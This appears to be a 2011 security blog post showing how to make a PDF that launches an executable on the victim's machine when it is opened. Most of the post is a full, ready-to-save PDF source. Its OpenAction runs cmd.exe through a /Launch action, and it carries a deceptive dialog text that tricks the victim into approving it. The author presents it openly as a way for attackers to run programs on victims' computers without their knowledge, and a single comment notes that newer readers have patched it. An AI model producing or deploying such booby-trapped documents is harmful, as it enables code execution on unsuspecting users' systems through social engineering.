Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application.

Thursday, March 3, 2011

Launching .EXE File While Opening PDF

How does an attacker execute .exe file on victim's computer without any knowledge to victim? Answer: Using Remote command execution


There are different techniques to execute remote command on victim's system without any knowledge to victim.

Below is a simple example to lunch any .exe file while opening a PDF file. By using this technique an attacker can send a PDF file which looks like a valuable or important PDF but the intension is to execute any kind of .exe file in victim's system.

Just save this below code as PDF and then try to open the PDF it will call the cmd.exe file and open the CMD console


%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World!)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
/P (\nTo continue viewing the encrypted content\nplease click the “Don’t show this message again” box\nand press OK!)
>>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF


1 comment:

  1. This loophole has been patched in the newer versions.

    ReplyDelete